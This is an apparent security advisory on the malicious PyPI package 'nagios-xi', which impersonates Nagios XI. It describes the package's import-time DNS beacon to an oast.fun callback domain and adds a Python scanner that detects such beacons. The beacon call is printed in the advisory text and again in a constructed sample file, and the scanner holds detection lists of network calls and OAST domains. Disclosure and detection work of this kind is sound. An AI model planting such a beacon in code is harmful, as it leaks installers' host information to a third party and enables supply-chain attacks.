Vulnerability
Malicious code in nagios-xi (PyPI)
---

Per source details.

## Source: amazon-inspector (c11c80cc2d314460d61a649c84fd75881388470382be8183b77b362e562a5c7f)

On `import nagios_xi`, the package's `__init__.py` (lines 5-8) invokes `socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun")` inside a silent try/except. oast.fun is ProjectDiscovery's Interactsh out-of-band callback service; the DNS query itself is the exfiltration channel, confirming code execution on the installer's host and leaking the resolver IP to whoever controls the unique 32-character Interactsh subdomain.

The package ships no actual functionality: it impersonates the Nagios XI commercial monitoring product (name `nagios-xi`, version `19.5.0` mimicking real Nagios XI versioning) while declaring an anonymous ProtonMail author (`Coding Team <pocbug@protonmail.com>`), a generic `package utility` description, and an empty README. The combination of brand impersonation, placeholder metadata, and an import-time OAST beacon as the package's sole behavior is reconnaissance for a supply-chain attack against developers searching for Nagios XI integrations.

## Source: kam193 (d8b27c2588accf4f2966f4630a12f9bfdc4ba621403f14237160632447152f23)

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

---

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

- The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
- The package overrides the install command in setup.py to execute malicious code during installation.
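The import-time beacon described above can be caught before installation by static review of the package source. The following scanner is an added example written for this advisory, not code from either source report or from the package: it parses a module with Python's `ast`, reports resolver/HTTP calls that run on plain `import` (module scope, including inside try/except), and flags string-literal hostnames under out-of-band callback services. The page names only `oast.fun`; the other Interactsh suffixes in `OAST_SUFFIXES` are assumed, and `SAMPLE_INIT` is a constructed `__init__.py` mirroring the reported structure.

```python
import ast

# Calls that, at module scope, execute on a bare `import` of the package.
NETWORK_CALLS = {
    "socket.gethostbyname", "socket.getaddrinfo", "socket.create_connection",
    "urllib.request.urlopen", "requests.get", "requests.post",
}
# Out-of-band callback (OAST) domains. oast.fun is from the report; the rest
# are assumed Interactsh defaults and should be reviewed for your environment.
OAST_SUFFIXES = (".oast.fun", ".oast.me", ".oast.live", ".oast.site",
                 ".oast.online", ".oast.pro", ".interact.sh")

# Constructed sample reproducing the reported __init__.py shape (not the real file).
SAMPLE_INIT = '''\
"""package utility"""
import socket

try:
    socket.gethostbyname("atlass-check.autaeqjhfowvnnmkwhxjtq8x39d8nder1.oast.fun")
except Exception:
    pass

def connect(host):  # inside a def: only runs when called, so not flagged
    return socket.gethostbyname(host)
'''

def _dotted(node):
    """Return 'socket.gethostbyname' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def _import_time_nodes(node):
    """Yield nodes reachable at import: descend through try/if/with/for bodies
    but never into def/class/lambda bodies, which run only when invoked."""
    if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef, ast.Lambda)):
        return
    yield node
    for child in ast.iter_child_nodes(node):
        yield from _import_time_nodes(child)

def scan_import_time_network(source: str) -> list:
    """Return one finding per import-time network call: line, call, literal
    hostnames passed to it, and whether any hostname is an OAST beacon."""
    findings = []
    for node in _import_time_nodes(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted(node.func) in NETWORK_CALLS:
            hosts = [a.value for a in node.args
                     if isinstance(a, ast.Constant) and isinstance(a.value, str)]
            findings.append({"line": node.lineno, "call": _dotted(node.func), "hosts": hosts,
                             "oast": any(h.lower().endswith(OAST_SUFFIXES) for h in hosts)})
    return findings

if __name__ == "__main__":
    for finding in scan_import_time_network(SAMPLE_INIT):
        print(finding)
```

Running it on the constructed sample reports the `socket.gethostbyname` call on line 5 with `oast` set to `True`, and nothing for the call inside `connect`.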
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
No exploitation, limited impact or prevalence